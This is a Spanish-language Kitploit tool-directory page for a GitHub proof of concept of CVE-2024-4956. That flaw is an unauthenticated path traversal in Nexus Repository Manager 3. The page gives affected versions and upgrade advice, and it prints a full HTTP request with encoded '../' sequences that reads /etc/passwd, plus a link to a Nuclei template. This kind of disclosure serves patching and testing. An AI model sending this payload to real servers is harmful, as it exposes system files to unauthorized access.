Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-4956 — Path Traversal no autenticado en Nexus Repository 3 | Kitploit
Herramientas/GitHubGitHub/erickfernandox/cve-2024-4956
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHuberickfernandox/cve-2024-4956

CVE-2024-4956

Path Traversal no autenticado en Nexus Repository 3

Ver Repositorio
3hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-4956 - Path Traversal sin autenticación en Nexus Repository Manager 3

Nexus Repository Manager es un administrador de repositorios que organiza, almacena y distribuye artefactos necesarios para el desarrollo.

Se ha descubierto una vulnerabilidad de path traversal en Nexus Repository 3, en versiones anteriores a la 3.68.1. Esta vulnerabilidad permite a un atacante manipular una URL para descargar archivos del sistema fuera del alcance de la aplicación Nexus Repository, sin necesidad de autenticación alguna. Esto representa un riesgo significativo, ya que puede exponer archivos sensibles del sistema y potencialmente comprometer la seguridad del entorno donde está instalado Nexus Repository.

Se recomienda actualizar Nexus Repository a la versión 3.68.1 o posterior lo antes posible para mitigar esta vulnerabilidad.

Para más información y detalles técnicos sobre la vulnerabilidad, consulte el siguiente enlace:

Referencias:

  • https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16

Versiones vulnerables

La vulnerabilidad afecta a las versiones 3.0 a 3.68.0 de Sonatype Nexus Repository Manager.

Mitigación:

Actualizar Nexus Repository es el enfoque recomendado para eliminar esta vulnerabilidad. Sin embargo, existen opciones de mitigación inmediata para implementaciones que no puedan actualizarse de inmediato:

Referencias:

  • https://support.sonatype.com/hc/en-us/articles/29412417068819

PoC

root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

Con el PoC anterior, es posible ver el archivo /etc/passwd siendo accedido:

Plantilla de Nuclei

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml

Descargar herramienta